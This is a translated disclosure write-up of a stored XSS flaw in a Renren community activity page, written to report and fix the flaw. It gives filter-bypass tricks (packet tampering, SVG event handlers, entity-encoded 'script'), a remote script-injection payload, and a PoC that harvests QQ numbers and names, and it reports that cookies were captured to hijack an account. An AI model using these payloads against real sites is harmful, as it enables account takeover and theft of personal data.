A function of Renren community can cause worms (XSS filtering analysis and bypassing skills)

A function of Renren community can cause worms (XSS filtering analysis and bypassing skills)

In other words, the front-end filter is used at the beginning, and the script of any length can be uploaded after packet capture and modification. Therefore, you do not need to consider cross-domain issues when writing worms here, but the & symbol will be eaten inexplicably. Today, I saw that the vulnerability was supplemented, not just for foreground filtering. The background also performs keyword detection, such as <script> and some other keywords. Although no svg filter can be used to pop up a window, I don't know why it is a problem to keep up with the resource link, but it was triggered successfully. Let's take a look at it. I didn't cut a lot of images in the initial test. Today I want to cut a few more screenshots to complete it. The browser is Firefox and chrome.

When entering the activity introduction, the filtering is lax. The front-end can use packet capture to change the package to solve the problem. The background filtering is not strict.

In the first test, no filtering is performed in the background. You can directly change the package to <script> xxxxx.
 

This is the case today. Keyword filtering is added to the background.
 

However, svg is not filtered. However, I do not know why the resource link request after svg/onload is always unsuccessful.
 

 

I changed it and re-encoded it with the out-of-band link. In addition, when the code is re-encoded, it is found that if the script is like this

onerror="JavaScriptCode like <scrip&#116>"

It cannot be filtered out. It should be because no encoded data is detected and only the encoded data is detected.
 

Comes with several svg test code

onerror="with(document)body.appendChild(createElement('script')).src='xxxxxxxxx'"<svg xmlns="url"><g onload="javascript：alert(1)"></g></svg>

I use a Firefox browser to publish an account, and then use another account to access the account through the chrome account. The cookie is successfully obtained and can be hijacked.
 

 

 

Because community members can be directly published to the main station of Renren and can be used as worms for college students (good chickens. A short poc that obtains user information, such as phone numbers and deductions, is attached here. Access m.ren.com in the domain and then call.

function getQQ(){var quickExpr =/<div>Q([^<]*)/g;  var headhtml = window.document.head.innerHTML;var qq=quickExpr.exec(headhtml);return qq[1];}function getname(){var quickExpr =/- ([^</tltle]*)/g;  var headhtml = window.document.head.innerHTML;var name=quickExpr.exec(headhtml);return name[1];}

Match the name, and the Goddess's name will be mosaic.

QQ goddess is not for you
 

In other words, we soon deleted the testing activities and did not have any impact. We begged rank. The activity is canceled in the red circle.
 

 

Solution:

Foreground filter keyword